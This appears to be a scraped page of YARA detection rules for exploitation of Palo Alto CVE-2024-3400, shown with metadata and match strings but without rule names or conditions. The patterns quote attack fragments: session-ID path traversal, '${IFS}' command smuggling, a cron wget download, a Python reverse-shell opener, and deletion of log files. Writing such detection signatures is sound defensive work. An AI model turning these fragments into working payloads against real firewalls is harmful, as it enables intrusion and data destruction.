Yara Rule - 의심스러운 Base64 인코딩 된 쉘 명령 감지 (Palo Alto CVE-2024-3400 Exploitation에서 볼 수 있듯이)
Yara 정의.
Yara Rule - Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Yara definition.
Author: Christian Burkard
Internal Research
date = "2024-04-15"
modified = "2024-04-18"
score = 70
$x1 = "cmd = base64.b64decode(rst.group"
$x2 = "f.write(\"/*\"+output+\"*/\")"
$x3 = "* * * * * root wget -qO- http://"
$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
$x5a = "failed to unmarshal session(../" // https://security.paloaltonetworks.com/CVE-2024-3400
$x5b = "failed to unmarshal session(./../" // customer data
$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
$x7 = "$(uname -a) > /var/" base64
date = "2024-04-15"
score = 70
$x1 = "SESSID=../../../../opt/panlogs/"
$x2 = "SESSID=./../../../../opt/panlogs/"
$sa1 = "SESSID=../../../../"
$sa2 = "SESSID=./../../../../"
$sb2 = "${IFS}"
date = "2024-04-18"
score = 75
$sa1 = "curl http" base64
$sa2 = "wget http" base64
$sb1 = "chmod 777 " base64
$sb2 = "/tmp/" base64
date = "2024-04-15"
score = 65
$x1 = "import sys,socket,os,pty;s=socket.socket("
date = "2024-04-18"
score = 75
$s1 = "curl http://" base64
$s2 = "wget http://" base64
$s3 = ";chmod 777 " base64
$s4 = "/tmp/" base64```
[https://github.com/Neo23x0/signature-base/commit/415fb41176f2c17139fa088ff436cae5fc0cf111](https://github.com/Neo23x0/signature-base/commit/415fb41176f2c17139fa088ff436cae5fc0cf111)